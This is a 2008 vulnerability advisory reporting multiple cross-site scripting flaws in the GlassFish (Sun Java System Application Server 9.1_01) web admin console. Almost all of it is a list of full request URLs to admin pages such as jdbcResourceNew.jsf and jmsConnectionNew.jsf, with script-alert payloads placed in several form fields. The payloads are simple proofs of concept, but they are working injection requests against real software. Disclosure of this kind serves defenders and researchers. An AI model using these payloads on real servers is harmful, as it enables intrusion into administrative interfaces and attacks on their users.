============================== Muitiple XSS - Glassfish Web Interface (Sun Java System Application Server 9.1_01 (build b09d-fcs) ) ============================== Author: Eduardo Neves a.k.a _eth0_ Date: 14 june 2008 Site: http://webappsecurity.wordpress.com ============================== APPLICATION : Glassfish webadmin interface VERSION : Sun Java System Application Server 9.1_01 (build b09d-fcs) VENDOR : http://www.sun.com DOWNLOAD : https://glassfish.dev.java.net/ ============================== IMPACT: XSS, XSRF, etc. Severity: Low (or not?) ============================== Descrition: This vulnerability affect some webpages in the glassfish webadmin interface, that vulnerability allow user can insert a malicious or a not expected input data in the input type field.That was found in 10+ input data field in glassfish. This is a vulnerable URL: http://[HOSTNAME]:4848/resourceNode/customResourceNew.jsf?propertyForm%3 Aproper tyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertyCon tentPage %3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3AJndiNew=%3Cscrip t%3Ealer t%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3A property Sheet%3ApropertSectionTextField%3AresTypeProp%3AresType=%3Cscript%3Ealer t%28%27x ss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3Aproperty Sheet%3A propertSectionTextField%3AfactoryClassProp%3AfactoryClass=%3Cscript%3Eal ert%28%2 7xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3Aproper tySheet% 3ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%28%27xss%2 7%29%3B% 3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3Aprop ertSecti onTextField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3AhelpKey=cus tomresou rcescreate.html&propertyForm_hidden=propertyForm_hidden&javax.faces.View State=j_ id276%3Aj_id282&com_sun_webui_util_FocusManager_focusElementId=propertyF orm%3Apr opertyContentPage%3AtopButtons%3AnewButton http://[HOSTNAME]:4848/resourceNode/externalResourceNew.jsf?propertyForm %3Aprope rtyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertyCo ntentPag e%3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3AJndiNew=%3Cscri pt%3Eale rt%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3 Apropert ySheet%3ApropertSectionTextField%3AresTypeProp%3AresType=%3Cscript%3Eale rt%28%27 xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3Apropert ySheet%3 ApropertSectionTextField%3AfactoryClassProp%3AfactoryClass=%3Cscript%3Ea lert%28% 27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3Aprope rtySheet %3ApropertSectionTextField%3AjndiLookupProp%3AjndiLookup=%3Cscript%3Eale rt%28%27 xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3Apropert ySheet%3 ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%28%27xss%27 %29%3B%3 C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3Aprope rtSectio nTextField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3ApropertyCont entPage% 3AhelpKey=externalresourcescreate.html&propertyForm_hidden=propertyForm_ hidden&j avax.faces.ViewState=j_id289%3Aj_id293&com_sun_webui_util_FocusManager_f ocusElem entId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton http://[HOSTNAME]:4848/resourceNode/jmsDestinationNew.jsf?propertyForm%3 Apropert yContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertyShee t%3Aprop ertSectionTextField%3AjndiProp%3AJndi=%3Cscript%3Ealert%28%27xss%27%29%3 B%3C%2Fs cript%3E&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AnamePr op%3Anam e=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3Aprop ertyShee t%3ApropertSectionTextField%3AresTypeProp%3AresType=javax.jms.Topic&prop ertyForm %3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3 Ealert%2 8%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertySheet%3ApropertSe ctionTex tField%3AstatusProp%3Acb=true&propertyForm%3AbasicTable%3ArowGroup1%3A0% 3Acol2%3 Acol1St=Description&propertyForm%3AbasicTable%3ArowGroup1%3A0%3Acol3%3Ac ol1St=&p ropertyForm%3AhelpKey=jmsdestinationnew.html%09&propertyForm_hidden=prop ertyForm _hidden&javax.faces.ViewState=j_id242%3Aj_id246&com_sun_webui_util_Focus Manager_ focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButt on http://[HOSTNAME]:4848/resourceNode/jmsConnectionNew.jsf?propertyForm%3A property ContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertySheet %3Agener alPropertySheet%3AjndiProp%3AJndi=%3Cscript%3Ealert%28%27xss%27%29%3B%3C %2Fscrip t%3E&propertyForm%3ApropertySheet%3AgeneralPropertySheet%3AresTypeProp%3 AresType =javax.jms.TopicConnectionFactory&propertyForm%3ApropertySheet%3Ageneral Property Sheet%3AdescProp%3Acd=%3Cscript%3Ealert%28%27xss2%27%29%3B%3C%2Fscript%3 E&proper tyForm%3ApropertySheet%3AgeneralPropertySheet%3AstatusProp%3Asun_checkbo x9=true& propertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AinitSizeProp% 3Ads=8&p ropertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AmaxProp%3Ads2= 32&prope rtyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AresizeProp%3Ads3=2 &propert yForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AidleProp%3Ads=300&pr opertyFo rm%3ApropertySheet%3ApoolSettingsPropertySheet%3AmaxWaitProp%3Ads=60000& property Form%3ApropertySheet%3ApoolSettingsPropertySheet%3Atransprop%3Atrans=&pr opertyFo rm%3AbasicTable%3ArowGroup1%3A0%3Acol2%3Acol1St=Password&propertyForm%3A basicTab le%3ArowGroup1%3A0%3Acol3%3Acol1St=guest&propertyForm%3AbasicTable%3Arow Group1%3 A1%3Acol2%3Acol1St=UserName&propertyForm%3AbasicTable%3ArowGroup1%3A1%3A col3%3Ac ol1St=guest&propertyForm%3AhelpKey=jmsconnectionnew.html&propertyForm_hi dden=pro pertyForm_hidden&javax.faces.ViewState=j_id226%3Aj_id234&com_sun_webui_u til_Focu sManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons% http://[HOSTNAME]:4848/resourceNode/jdbcResourceNew.jsf?propertyForm%3Ap ropertyC ontentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertySheet% 3Aproper tSectionTextField%3AjndiProp%3Ajnditext=<script>alert('xss');</script>&p ropertyF orm%3ApropertySheet%3ApropertSectionTextField%3ApoolNameProp%3APoolName= __CallFl owPool&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AdescProp %3Adesc= <script>alert('xss3');</script>&propertyForm%3ApropertySheet%3ApropertSe ctionTex tField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3AhelpKey=jdbcreso urcenew. html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id1 85%3Aj_i d201&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3Aprope rtyConte ntPage%3AtopButtons%3AnewButton http://[HOSTNAME]:4848/applications/lifecycleModulesNew.jsf?propertyForm %3Aprope rtyContentPage%3ApropertySheet%3ApropertSectionTextField%3AnameProp%3Ana me=<scri pt>alert('xss');</script>&propertyForm%3ApropertyContentPage%3ApropertyS heet%3Ap ropertSectionTextField%3AclassNameProp%3Aclassname=<script>alert('xss2') ;</scrip t>&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTe xtField% 3ApathProp%3AclassPath=&propertyForm%3ApropertyContentPage%3ApropertyShe et%3Apro pertSectionTextField%3AloadOrderProp%3AloadOrder=<script>alert('xss3');< /script> &propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionText Field%3A descProp%3Adesc=&propertyForm%3ApropertyContentPage%3ApropertySheet%3Apr opertSec tionTextField%3AstatusProp%3Asun_checkbox8=true&propertyForm%3ApropertyC ontentPa ge%3AbottomButtons%3AsaveButton2=++OK++&propertyForm%3AhelpKey=lifecycle modules. html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id1 17%3Aj_i d125&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3Aprope rtyConte ntPage%3AbottomButtons%3AsaveButton2 http://[HOSTNAME]:4848/resourceNode/jdbcConnectionPoolNew1.jsf?propertyF orm%3Apr opertyContentPage%3AtopButtons%3AnextButton=+Next+&propertyForm%3Aproper tyConten tPage%3ApropertySheet%3AgeneralPropertySheet%3AjndiProp%3Aname=<script>a lert('xs s')</script>&propertyForm%3ApropertyContentPage%3ApropertySheet%3Agenera lPropert ySheet%3AresTypeProp%3AresType=<script>alert('xss2');</script>&propertyF orm%3Apr opertyContentPage%3ApropertySheet%3AgeneralPropertySheet%3AdbProp%3Adb=< script>a lert('xss3');</script>&propertyForm%3AhelpKey=jdbcconnectionpoolnew1.htm l&proper tyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id7%3Aj_id34&c om_sun_w ebui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage %3AtopBu ttons%3AnextButton And others =) -- |_|0|_| Serrano Neves - a.k.a eth0 |_|_|0| http://webappsecurity.wordpress.com |0|0|0| "Talk is cheap. Show me the code." - Linus Torvalds